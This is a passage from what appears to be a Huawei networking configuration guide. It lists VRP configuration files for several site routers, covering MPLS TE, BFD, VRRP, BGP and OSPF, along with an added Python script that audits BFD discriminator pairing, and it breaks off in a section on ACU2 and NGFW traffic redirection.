bfd UPE2toSPE1_m bind mpls-te interface Tunnel622 te-lsp
discriminator local 6221
discriminator remote 6222
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE2toSPE2_b bind mpls-te interface Tunnel621 te-lsp backup
discriminator local 6215
discriminator remote 6216
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE2toSPE2_m bind mpls-te interface Tunnel621 te-lsp
discriminator local 6211
discriminator remote 6212
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
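
Every BFD session in these files is one half of a pair: Core_SPE2's SPE2toUPE2_m (local 6212, remote 6211) only comes up because Site1_UPE2's UPE2toSPE2_m carries the mirror image (local 6211, remote 6212), and the same holds for the backup-LSP and VRRP sessions. A transposed digit on one side leaves a hot-standby path or a VRRP pair without its failure detection, and nothing in a single device's file reveals it. The script below is an added example, not code from the Huawei document: it parses the `bfd ... bind` blocks out of several device dumps and reports sessions whose discriminators have no mirror on another device. The two sample configurations are constructed and modelled on the Core_SPE2 and Site1_UPE2 listings, with one deliberate mismatch in the backup session.

```python
"""BFD discriminator pairing check across Huawei VRP-style config dumps.

Added example. Assumes one dump per device as in this section: a `bfd <name>
bind ...` block ends at a lone '#', and carries `discriminator local N` and
`discriminator remote N`. A session is considered paired when some other
device has a session with the mirror-image (local, remote) values.
"""
import re
from dataclasses import dataclass
from typing import Optional

BFD_HEADER = re.compile(r"bfd (\S+) bind ")
DISCRIMINATOR = re.compile(r"discriminator (local|remote) (\d+)")


@dataclass
class BfdSession:
    device: str
    name: str
    local: Optional[int] = None
    remote: Optional[int] = None

    def complete(self):
        return self.local is not None and self.remote is not None


def parse_bfd_sessions(config_text):
    """Extract the BFD sessions of one device; the device name comes from `sysname`."""
    device = "?"
    sessions = []
    current = None

    def flush():
        nonlocal current
        if current is not None and current.complete():
            sessions.append(current)
        current = None

    for raw in config_text.splitlines():
        line = raw.strip()
        if line.startswith("sysname "):
            device = line.split(None, 1)[1]
        elif line == "#":
            flush()
        elif BFD_HEADER.match(line):
            flush()
            current = BfdSession(device, BFD_HEADER.match(line).group(1))
        elif current is not None:
            m = DISCRIMINATOR.match(line)
            if m:
                setattr(current, m.group(1), int(m.group(2)))
    flush()
    return sessions


def check_pairing(sessions):
    """Pair each session with one on another device whose (local, remote)
    equals our (remote, local). Returns (paired, unpaired)."""
    by_key = {}
    for s in sessions:
        by_key.setdefault((s.local, s.remote), []).append(s)
    paired, unpaired = [], []
    for s in sessions:
        mirrors = [m for m in by_key.get((s.remote, s.local), []) if m.device != s.device]
        if mirrors:
            paired.append((s, mirrors[0]))
        else:
            unpaired.append(s)
    return paired, unpaired


def audit_bfd(configs):
    """Return names of paired sessions and 'device:name' of unpaired ones."""
    sessions = [s for text in configs for s in parse_bfd_sessions(text)]
    paired, unpaired = check_pairing(sessions)
    return {
        "paired": sorted(s.name for s, _ in paired),
        "unpaired": sorted(f"{s.device}:{s.name}" for s in unpaired),
    }


# Constructed samples: the main sessions mirror correctly, the backup pair
# does not (remote 6217 on the UPE should have been 6216).
SPE2_CONFIG = """\
sysname Core_SPE2
#
bfd SPE2toUPE2_m bind mpls-te interface Tunnel621 te-lsp
 discriminator local 6212
 discriminator remote 6211
 commit
#
bfd SPE2toUPE2_b bind mpls-te interface Tunnel621 te-lsp backup
 discriminator local 6216
 discriminator remote 6215
 commit
#
return
"""
UPE2_CONFIG = """\
sysname Site1_UPE2
#
bfd UPE2toSPE2_m bind mpls-te interface Tunnel621 te-lsp
 discriminator local 6211
 discriminator remote 6212
 commit
#
bfd UPE2toSPE2_b bind mpls-te interface Tunnel621 te-lsp backup
 discriminator local 6215
 discriminator remote 6217
 commit
#
return
"""

if __name__ == "__main__":
    print(audit_bfd([SPE2_CONFIG, UPE2_CONFIG]))
```

Feed it all seven device files at once: the pairing key is device-independent, so a session is also flagged when its partner exists but lives in a file that was not collected, which is exactly the case a partial export would hide.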

2.5.7.6 Site2_UPE3 Configuration File

sysname Site2_UPE3
#
router id 172.16.2.75
#
arp vlink-direct-route advertise
#
stp disable
#
set service-mode enhanced
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.75
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
interface XGigabitEthernet0/0/1
undo portswitch
description Site2_UPE3 to Core_SPE2
ip address 172.16.8.179 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 1
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet0/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet0/0/2.150
dot1q termination vid 150
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.150.2 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.150.1
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 2150 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet0/0/4
undo portswitch
description Site2_UPE3 to Site2_UPE4
ip address 172.16.8.180 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.75 255.255.255.255
#
interface Tunnel111
description Site2_UPE3 to Core_SPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.3
mpls te tunnel-id 111
mpls te record-route
mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel112
description Site2_UPE3 to Core_SPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.4
mpls te tunnel-id 112
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-1 bind peer-ip 172.18.150.3 vpn-instance vpna interface XGigabitEthernet0/0/2.150 source-ip 172.18.150.2
discriminator local 2150
discriminator remote 1150
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.76 as-number 65000
peer 172.16.2.76 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.4 enable
undo peer 172.16.2.76 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.3 preferred-value 300
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer 172.16.0.4 preferred-value 200
peer devHost enable
peer devHost advertise-community
peer 172.16.2.76 enable
peer 172.16.2.76 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface XGigabitEthernet0/0/1
undo silent-interface XGigabitEthernet0/0/4
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#zJm-P{(FiMrB0bLa^ST'z[!(UezNNTx\CQ6@N\,K%^%#
network 172.16.2.75 0.0.0.0
network 172.16.8.179 0.0.0.0
network 172.16.8.180 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.76
#
route-policy p_iBGP_host_ex permit node 10
apply community 200:200 5720:5720 23:23
#
route-policy p_iBGP_RR_ex permit node 0
apply community 200:200 5720:5720 23:23
#
arp expire-time 62640
arp static 172.18.150.4 0000-0001-0003 vid 150 interface XGigabitEthernet0/0/2.150
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE3toSPE2_b bind mpls-te interface Tunnel111 te-lsp backup
discriminator local 1115
discriminator remote 1116
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE3toSPE2_m bind mpls-te interface Tunnel111 te-lsp
discriminator local 1111
discriminator remote 1112
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE3toSPE3_b bind mpls-te interface Tunnel112 te-lsp backup
discriminator local 1125
discriminator remote 1126
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE3toSPE3_m bind mpls-te interface Tunnel112 te-lsp
discriminator local 1121
discriminator remote 1122
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.7 Site2_UPE4 Configuration File

sysname Site2_UPE4
#
router id 172.16.2.76
#
arp vlink-direct-route advertise
#
stp disable
#
set service-mode enhanced
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.76
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
interface XGigabitEthernet0/0/1
undo portswitch
description Site2_UPE4 to Core_SPE3
ip address 172.16.8.182 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 2
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet0/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet0/0/2.150
dot1q termination vid 150
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.150.3 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.150.1
vrrp vrid 1 priority 90
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 1150 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet0/0/4
undo portswitch
description Site2_UPE4 to Site2_UPE3
ip address 172.16.8.181 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.76 255.255.255.255
#
interface Tunnel121
description Site2_UPE4 to Core_SPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.3
mpls te tunnel-id 121
mpls te record-route
mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel122
description Site2_UPE4 to Core_SPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.4
mpls te tunnel-id 122
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-1 bind peer-ip 172.18.150.2 vpn-instance vpna interface XGigabitEthernet0/0/2.150 source-ip 172.18.150.3
discriminator local 1150
discriminator remote 2150
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.75 as-number 65000
peer 172.16.2.75 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.4 enable
undo peer 172.16.2.75 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.3 preferred-value 200
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer 172.16.0.4 preferred-value 300
peer devHost enable
peer devHost advertise-community
peer 172.16.2.75 enable
peer 172.16.2.75 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface XGigabitEthernet0/0/1
undo silent-interface XGigabitEthernet0/0/4
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#"sZy-UeQ88(kmb#.o"Y8*@/_9D[_<-3ET`+!1no4%^%#
network 172.16.2.76 0.0.0.0
network 172.16.8.181 0.0.0.0
network 172.16.8.182 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.75
#
route-policy p_iBGP_host_ex permit node 0
apply community 300:300 5720:5720 23:23
#
route-policy p_iBGP_RR_ex permit node 0
apply community 300:300 5720:5720 23:23
#
arp expire-time 62640
arp static 172.18.150.4 0000-0001-0003 vid 150 interface XGigabitEthernet0/0/2.150
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE4toSPE2_b bind mpls-te interface Tunnel121 te-lsp backup
discriminator local 1215
discriminator remote 1216
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE4toSPE2_m bind mpls-te interface Tunnel121 te-lsp
discriminator local 1211
discriminator remote 1212
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE4toSPE3_b bind mpls-te interface Tunnel122 te-lsp backup
discriminator local 1225
discriminator remote 1226
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE4toSPE3_m bind mpls-te interface Tunnel122 te-lsp
discriminator local 1221
discriminator remote 1222
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.8 Site3_UPE5 Configuration File

sysname Site3_UPE5
#
router id 172.16.2.87
#
arp vlink-direct-route advertise
#
stp disable
#
set service-mode enhanced
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.87
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
interface XGigabitEthernet0/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet0/0/2.100
dot1q termination vid 100
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.100.2 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.100.1
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 2150 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet0/0/1
undo portswitch
description Site3_UPE5 to Site3_UPE6
ip address 172.17.10.0 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet0/0/4
undo portswitch
description Site3_UPE5 to Core_SPE3
ip address 172.16.8.212 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 2
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.87 255.255.255.255
#
interface Tunnel721
description Site3_UPE5 to Core_SPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.5
mpls te tunnel-id 312
mpls te record-route
mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel722
description Site3_UPE5 to Core_SPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.4
mpls te tunnel-id 322
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-2000 bind peer-ip 172.18.100.3 vpn-instance vpna interface XGigabitEthernet0/0/2.100 source-ip 172.18.100.2 auto
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.86 as-number 65000
peer 172.16.2.86 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.0.4 enable
undo peer 172.16.0.5 enable
undo peer 172.16.2.86 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer 172.16.0.4 preferred-value 300
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer 172.16.0.5 preferred-value 200
peer devHost enable
peer devHost advertise-community
peer 172.16.2.86 enable
peer 172.16.2.86 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface XGigabitEthernet0/0/1
undo silent-interface XGigabitEthernet0/0/4
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %#%#^tB:@vm8r%4Z0),RRem7dU.A3.}(a&*/IhJ70>y9%#%#
network 172.16.2.87 0.0.0.0
network 172.16.8.212 0.0.0.0
network 172.17.10.0 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.86
#
route-policy p_iBGP_host_ex permit node 0
apply community 300:300 5720:5720 13:13
#
route-policy p_iBGP_RR_ex permit node 0
apply community 300:300 5720:5720 13:13
#
arp expire-time 62640
arp static 172.18.100.4 0000-0002-0003 vid 100 interface XGigabitEthernet0/0/2.100
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE5toSPE1_b bind mpls-te interface Tunnel721 te-lsp backup
discriminator local 7215
discriminator remote 7216
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE5toSPE1_m bind mpls-te interface Tunnel721 te-lsp
discriminator local 7211
discriminator remote 7212
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE5toSPE3_b bind mpls-te interface Tunnel722 te-lsp backup
discriminator local 7225
discriminator remote 7226
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE5toSPE3_m bind mpls-te interface Tunnel722 te-lsp
discriminator local 7221
discriminator remote 7222
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.9 Site3_UPE6 Configuration File

sysname Site3_UPE6
#
router id 172.16.2.86
#
arp vlink-direct-route advertise
#
stp disable
#
set service-mode enhanced
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.86
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
interface XGigabitEthernet0/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet0/0/2.100
dot1q termination vid 100
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.100.3 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.100.1
vrrp vrid 1 priority 90
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 2150 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet0/0/1
undo portswitch
description Site3_UPE6 to Site3_UPE5
ip address 172.17.10.1 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet0/0/4
undo portswitch
description Site3_UPE6 to Core_SPE1
ip address 172.17.10.3 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 1
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.86 255.255.255.255
#
interface Tunnel711
description Site3_UPE6 to Core_SPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.5
mpls te tunnel-id 311
mpls te record-route
mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel712
description Site3_UPE6 to Core_SPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.4
mpls te tunnel-id 321
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-1 bind peer-ip 172.18.100.2 vpn-instance vpna interface XGigabitEthernet0/0/2.100 source-ip 172.18.100.3 auto
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.87 as-number 65000
peer 172.16.2.87 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.0.4 enable
undo peer 172.16.0.5 enable
undo peer 172.16.2.87 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer 172.16.0.4 preferred-value 200
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer 172.16.0.5 preferred-value 300
peer devHost enable
peer devHost advertise-community
peer 172.16.2.87 enable
peer 172.16.2.87 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface XGigabitEthernet0/0/1
undo silent-interface XGigabitEthernet0/0/4
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %#%#<3.TS63Ml*_Gn]2$}@O/G8llX)VNvDY\kT;4E9-A%#%#
network 172.16.2.86 0.0.0.0
network 172.17.10.1 0.0.0.0
network 172.17.10.3 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.87
#
route-policy p_iBGP_host_ex permit node 0
apply community 100:100 5720:5720 13:13
#
route-policy p_iBGP_RR_ex permit node 0
apply community 100:100 5720:5720 13:13
#
arp expire-time 62640
arp static 172.18.100.4 0000-0002-0003 vid 100 interface XGigabitEthernet0/0/2.100
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE6toSPE1_b bind mpls-te interface Tunnel711 te-lsp backup
discriminator local 7115
discriminator remote 7116
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE6toSPE1_m bind mpls-te interface Tunnel711 te-lsp
discriminator local 7111
discriminator remote 7112
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE6toSPE3_b bind mpls-te interface Tunnel712 te-lsp backup
discriminator local 7125
discriminator remote 7126
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE6toSPE3_m bind mpls-te interface Tunnel712 te-lsp
discriminator local 7121
discriminator remote 7122
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.6 Example for Configuring ACU2 and NGFW on Switches

Background
When a switch on the live network has both ACU2 and NGFW configured, redirection needs
to be configured to ensure correct forwarding for the upstream and downstream traffic of
STAs. In addition, the wireless traffic entering and leaving the switch must be processed
according to the policies configured on NGFW.

Configuration Notes
On the NGFW side, two fixed internal Ethernet interfaces are GE1/0/0 and GE1/0/1. On the
switch side, the internal Ethernet interface numbers depend on the slot ID of the NGFW
module. For example, when the NGFW module is installed in slot 1, the interface numbers are
XGE1/0/0 and XGE1/0/1.
On the ACU2 side, two fixed internal Ethernet interfaces are XGE0/0/1 and XGE0/0/2. On
the switch side, the internal Ethernet interface numbers depend on the slot ID of the ACU2.
For example, when the ACU2 is installed in slot 2, the interface numbers are XGE2/0/0 and
XGE2/0/1.
Table 2-24 lists the products and versions to which this configuration example is applicable.

Table 2-24 Applicable products and versions

Product Model | Software Version
S12700       | V200R007 and V200R008
ACU2         | V200R005C10 and V200R005C20
NGFW module  | V100R001C10 and later versions

Networking Requirements
Two switches are located on the network shown in Figure 2-25. Switch_1 has NGFW and
ACU2 configured. Traffic policies are configured on NGFW.
The customer wants to use ACU2 to manage the wireless network, providing stable wireless
service to STAs.

Figure 2-25 Configuring ACU2 and NGFW on switches
(Topology figure not reproduced. Labels recovered from the figure: Network; Switch_1 with XGE3/0/1, Eth_trunk0, Eth_trunk1, XGE1/0/0 and XGE1/0/1; ACU2_1 with Eth_trunk1; NGFW_1 with GE1/0/0 and GE1/0/1; Switch_2 with Eth_trunk0 and GE0/0/1; AP.)

Data Plan
Table 2-25, Table 2-26, and Table 2-27 provide the data plan.

Table 2-25 Eth-Trunk

Device   | Interface Number | Member Interfaces
Switch_2 | Eth-trunk0       | XGE0/0/1, XGE0/0/2
Switch_1 | Eth-trunk0       | XGE3/0/2, XGE3/0/3
Switch_1 | Eth-trunk1       | XGE2/0/0, XGE2/0/1
ACU2_1   | Eth-trunk1       | XGE0/0/1, XGE0/0/2

Table 2-26 VLAN

Device   | Data                                                                  | Remarks
Switch_2 | Eth-trunk0: transparently transmits the packets from VLAN 42.          | Connected to Switch_1.
Switch_2 | GE0/0/1: VLAN 42                                                      | Connected to AP.
Switch_1 | Eth-trunk0: transparently transmits the packets from VLAN 42.          | Connected to Switch_2.
Switch_1 | Eth-trunk1: transparently transmits the packets from VLAN 42, VLAN 428. | Connected to ACU2_1.
Switch_1 | XGE1/0/0: transparently transmits the packets from VLAN 428.           | Connected to NGFW_1.
Switch_1 | XGE1/0/1: transparently transmits the packets from VLAN 428.           | Connected to NGFW_1.
Switch_1 | XGE3/0/1: transparently transmits the packets from VLAN 428.           | Connected to an upper-layer device.
ACU2_1   | Eth-trunk1: transparently transmits the packets from VLAN 42, VLAN 428. | Connected to Switch_1.
NGFW_1   | XGE1/0/0: transparently transmits the packets from VLAN 428.           | Connected to Switch_1.
NGFW_1   | XGE1/0/1: transparently transmits the packets from VLAN 428.           | Connected to Switch_1.

Table 2-27 IP Addresses

Device | Data                         | Remarks
ACU2_1 | VLANIF428: 172.16.29.1/24    | Configure VLANIF 428 to assign IP addresses to STAs.
ACU2_1 | VLANIF42: 172.18.255.240/24  | Configure VLANIF 42 as the CAPWAP source address.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure Eth-Trunk on each switch and add interfaces to VLANs. Configure the interfaces connecting Switch_2 to the DHCP server and AP to implement network connectivity.
2. Implement connections between ACU2 and Switch_1.
3. Implement connections between NGFW and Switch_1.
4. Configure wireless service on ACU2. Wireless service traffic is forwarded through tunnels, and ACU2_1 functions as a DHCP server to assign IP addresses to APs and STAs.
5. Configure traffic policies on each interface of Switch_1 and Switch_2 to ensure that STAs can successfully go online. The configurations include:
– Configure a redirection policy for the inbound traffic on Eth-Trunk 1, which is the internal interface between the switch and ACU2, to redirect the upstream wireless traffic to XGE1/0/1, which is the internal interface between the switch and NGFW. When the traffic returns from NGFW to XGE1/0/0, it matches the inbound redirection policy on that interface and is forwarded to the upstream interface XGE3/0/1.
– Configure a redirection policy for the inbound traffic on XGE3/0/1 to redirect the downstream wireless traffic to XGE1/0/0, which is the internal interface between the switch and NGFW. When the traffic returns from NGFW to XGE1/0/1, it matches the inbound redirection policy on that interface and is forwarded to Eth-Trunk 1, which is the internal interface between the switch and ACU2.
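The redirect chain in item 5 is easy to get wrong because the service-VLAN traffic re-enters Switch_1 from the NGFW module and is matched by the inbound policy a second time. The following Python model is an added illustration, not Huawei code: it encodes the four inbound redirections, the NGFW pair-interface and the trust/untrust security policy, traces one frame in each direction, and flags a redirect table whose chain never leaves the switch. Interface names follow the data plan (Eth-Trunk 1 faces ACU2_1); the hop-string format and the MAC-table placeholder for non-service VLANs are assumptions of the model.

```python
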